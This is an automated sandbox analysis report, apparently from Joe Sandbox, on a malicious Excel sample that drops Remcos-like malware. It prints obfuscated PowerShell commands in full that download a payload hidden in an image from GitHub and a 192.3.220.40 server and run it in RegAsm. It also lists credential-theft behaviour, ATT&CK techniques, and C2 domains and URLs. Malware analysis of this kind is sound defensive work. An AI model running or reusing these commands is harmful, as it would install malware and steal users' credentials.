[system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jecgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigferc10wvblicagicagicagicagicagicagicagicagicagicagicattuvnykvyzgvmaw5jdglptiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbhbwzscfv0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicague1kwhzolhn0cmluzyagicagicagicagicagicagicagicagicagicagicagrnqsdwludcagicagicagicagicagicagicagicagicagicagicagyxh4c2lbu0hmleludfb0ciagicagicagicagicagicagicagicagicagicagicageehxu3kpoycgicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicaiz3vncgjizudkvyigicagicagicagicagicagicagicagicagicagicagic1oqw1lu1bhy2ugicagicagicagicagicagicagicagicagicagicagig9nenphy015tiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjec6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaundavnduwl3nlzxrozwjlc3rwcmljzxdpdghnb29ky29va2llc21llnrjriisiirfbly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyismcwwkttzvgfsvc1ztgvlucgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyi='+[char]0x22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('tg'+'4imageurl = nllhtt'+'ps://'+'raw.githubuserco'+'ntent.com/cryptersandtoolsoficial/zip/refs/he'+'ad'+'s/main/d'+'etahnote_v.jpg nll;tg4webclient = new-object system.net.webclient;tg4imageb'+'ytes = tg4webclient.downloa'+'ddata(tg4imageurl);tg4imagetext = [system.text.encod'+'ing]::utf8.getstring(tg4imagebytes);tg4startflag = nll<<base64_start>>nl'+'l;tg4endflag = nll<<bas'+'e64_end>>nll;t'+'g4startindex = tg4imagetext.indexof(tg4startflag);tg4endindex = tg4imaget'+'ext.indexof(tg4endflag);tg4startindex'+' -g'+'e 0 -and tg4endindex -gt tg4startindex;tg4s'+'tartindex += tg4startflag.length;tg4base64length = tg4endindex - tg4startindex;tg4base64command'+' = tg4imagetext.substring('+'tg4startindex, tg4base64length);tg4commandbytes = [system.convert'+']::f'+'rombase64string(tg4base64command);tg4loadedassembl'+'y = [system.reflection.assembly]::load(tg4commandby'+'te'+'s);tg4vaimethod = [dnlib.io.home].getmethod(nllva'+'inll);tg4vai'+'method'+'.invoke(tg4null, @(nl'+'ltxt.eccfrr/054/04.022.3.291//:ptthnl'+'l, nlldesat'+'ivadon'+'ll, nlldesativadonll, nlldesativadonll, nllregasmnll, nlldesativadonll, nlldesativadonll));').replace('tg4',[string][char]36).replace(([char]78+[char]108+[char]76),[string][char]39) | . ((gv '*mdr*').name[3,11,2]-join'')"
                  Source: RegAsm.exe, 00000014.00000002.649655222.0000000000871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChrome51082_10142024 [Compatibility Mode]
                  Source: RegAsm.exe, 00000014.00000002.649655222.0000000000871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: RegAsm.exe, 00000014.00000002.649655222.0000000000871000.00000004.00000020.00020000.00000000.sdmp, logs.dat.20.drBinary or memory string: [Program Manager]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_10002933 cpuid 20_2_10002933
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,31_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,31_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,31_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,31_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,31_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,31_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,31_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,31_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,31_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,31_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,31_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,31_2_00451FD0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,20_2_10002264
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 25_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,25_2_004082CD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,31_2_00449210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0041739B GetVersionExW,24_2_0041739B
                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000014.00000002.650605085.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.649655222.0000000000855000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.509094010.0000000000551000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.650009264.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.649655222.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1884, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 31_2_0040BA4D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 31_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: \key3.db 31_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Key opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: ESMTPPassword 25_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 25_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 25_2_00402DB3
                  Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 1052, type: MEMORYSTR

                  Remote Access Functionality

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Mutex created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                  Source: Yara match; File source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 1884, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTR
                  Source: Yara match; File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: cmd.exe 31_2_0040569A
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | 121 Scripting | Valid Accounts | 11 Native API | 121 Scripting | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 13 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 23 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Bypass User Account Control | 21 Obfuscated Files or Information | 211 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement |
| Email Addresses | DNS Server | Domain Accounts | 123 Command and Scripting Interpreter | 1 Windows Service | 1 Access Token Manipulation | 1 Install Root Certificate | 2 Credentials in Registry | 1 System Service Discovery | SMB/Windows Admin Shares | 21 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | Login Hook | 1 Windows Service | 1 DLL Side-Loading | 3 Credentials In Files | 4 File and Directory Discovery | Distributed Component Object Model | 211 Input Capture | 1 Remote Access Software | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | 4 PowerShell | Network Logon Script | 322 Process Injection | 1 Bypass User Account Control | LSA Secrets | 39 System Information Discovery | SSH | 4 Clipboard Data | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 31 Security Software Discovery | VNC | GUI Input Capture | 213 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Virtualization/Sandbox Evasion | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 322 Process Injection | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 Remote System Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
                  [Behavior graph] Behavior Graph ID: 1533041, Sample: 037002451082_10142024.xls, Startdate: 14/10/2024, Architecture: WINDOWS, Score: 100

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| 037002451082_10142024.xls | 8% | Virustotal | | Browse |
| 037002451082_10142024.xls | 100% | Joe Sandbox ML | | |
                  No Antivirus matches
                  No Antivirus matches
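| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| raw.githubusercontent.com | 0% | Virustotal | | Browse |
| geoplugin.net | 0% | Virustotal | | Browse |
| jfm.com.co | 0% | Virustotal | | Browse |
| idabo.duckdns.org | 2% | Virustotal | | Browse |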
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| raw.githubusercontent.com | 185.199.108.133 | true | true | | unknown |
| geoplugin.net | 178.237.33.50 | true | false | | unknown |
| jfm.com.co | 150.136.81.248 | true | false | | unknown |
| idabo.duckdns.org | 135.148.195.248 | true | true | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIF | true | | unknown |
| idabo.duckdns.org | true | | unknown |
| https://jfm.com.co/k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid | false | | unknown |
| https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg | true | | unknown |
| http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta | true | | unknown |
| http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown |
| http://192.3.220.40/450/RRFCCE.txt | true | | unknown |
                                                      unknown
                                                      http://www.msn.com/?ocid=iehpbhv8F64.tmp.24.drfalse
                                                        unknown
                                                        https://contoso.com/powershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.450249616.00000000022DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.458543028.0000000012101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv8F64.tmp.24.drfalse
                                                          unknown
                                                          http://static.chartbeat.com/js/chartbeat.jsbhv8F64.tmp.24.drfalse
                                                            unknown
                                                            http://www.msn.com/de-de/?ocid=iehpbhv8F64.tmp.24.drfalse
                                                              unknown
                                                              http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta1.1mshta.exe, 0000000F.00000003.477311950.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473557209.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479193905.00000000032BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv8F64.tmp.24.drfalse
                                                                  unknown
                                                                  https://login.yahoo.com/config/loginRegAsm.exefalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.nirsoft.net/RegAsm.exe, 0000001A.00000002.484922847.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.428299496.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429316216.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.525064527.000000001C3F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477617431.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467397830.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472371461.0000000003315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.479228414.0000000003315000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529080074.000000001C158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.450249616.00000000020D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.536986295.000000000254D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.477794394.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.494980205.00000000021B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.536957265.0000000002300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.510569466.0000000002512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
